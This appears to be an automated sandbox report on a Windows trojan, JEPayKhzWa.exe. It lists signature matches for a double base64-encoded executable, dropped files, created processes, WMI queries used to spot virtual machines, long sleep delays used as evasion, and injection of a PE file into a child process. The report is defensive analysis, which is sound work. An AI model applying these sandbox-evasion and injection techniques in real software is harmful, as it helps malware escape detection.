Source: 0.2.JEPayKhzWa.exe.43f05b0.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 0.2.JEPayKhzWa.exe.43f05b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: JEPayKhzWa.exe PID: 7024, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: JEPayKhzWa.exe, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: (duplicate of the string in the entry below; elided)
                    Source: 0.0.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: 0.2.JEPayKhzWa.exe.f70000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: 3.2.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: 3.0.JEPayKhzWa.exe.2c0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: 4.2.JEPayKhzWa.exe.ef0000.1.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.cs | Base64 encoded string: [long base64 blob omitted]
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/25@5/1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JEPayKhzWa.exe.log
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | File created: C:\Users\user\AppData\Local\Temp\tmp2C38.tmp
                    Source: JEPayKhzWa.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: JEPayKhzWa.exe | Virustotal: Detection: 60%
                    Source: JEPayKhzWa.exe | ReversingLabs: Detection: 62%
                    Source: unknown | Process created: C:\Users\user\Desktop\JEPayKhzWa.exe 'C:\Users\user\Desktop\JEPayKhzWa.exe'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: JEPayKhzWa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: JEPayKhzWa.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: JEPayKhzWa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: JEPayKhzWa.exe | Static PE information: 0x99CD706E [Sun Oct 8 11:35:10 2051 UTC]
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_00F73509 push ss; ret 0_2_00F73534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 0_2_00F73148 push ss; ret 0_2_00F73534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 3_2_002C3148 push ss; ret 3_2_002C3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 3_2_002C3509 push ss; ret 3_2_002C3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_00EF3509 push ss; ret 4_2_00EF3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_00EF3148 push ss; ret 4_2_00EF3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_0305F100 push ecx; ret 4_2_0305F112
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_03052877 push ebx; ret 4_2_0305287A
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Code function: 4_2_05CD9C82 push ss; iretd 4_2_05CD9D17
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Window / User API: threadDelayed 924
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Window / User API: threadDelayed 8008
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 7100 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 6432 | Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmp | Binary or memory string: VMware
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79Zk
                    Source: JEPayKhzWa.exe, 00000004.00000002.720977141.0000000006AC3000.00000004.00000001.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79ZT771ROOT\//?U
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    Injects a PE file into foreign processes
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Memory written: C:\Users\user\Desktop\JEPayKhzWa.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe | Process created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe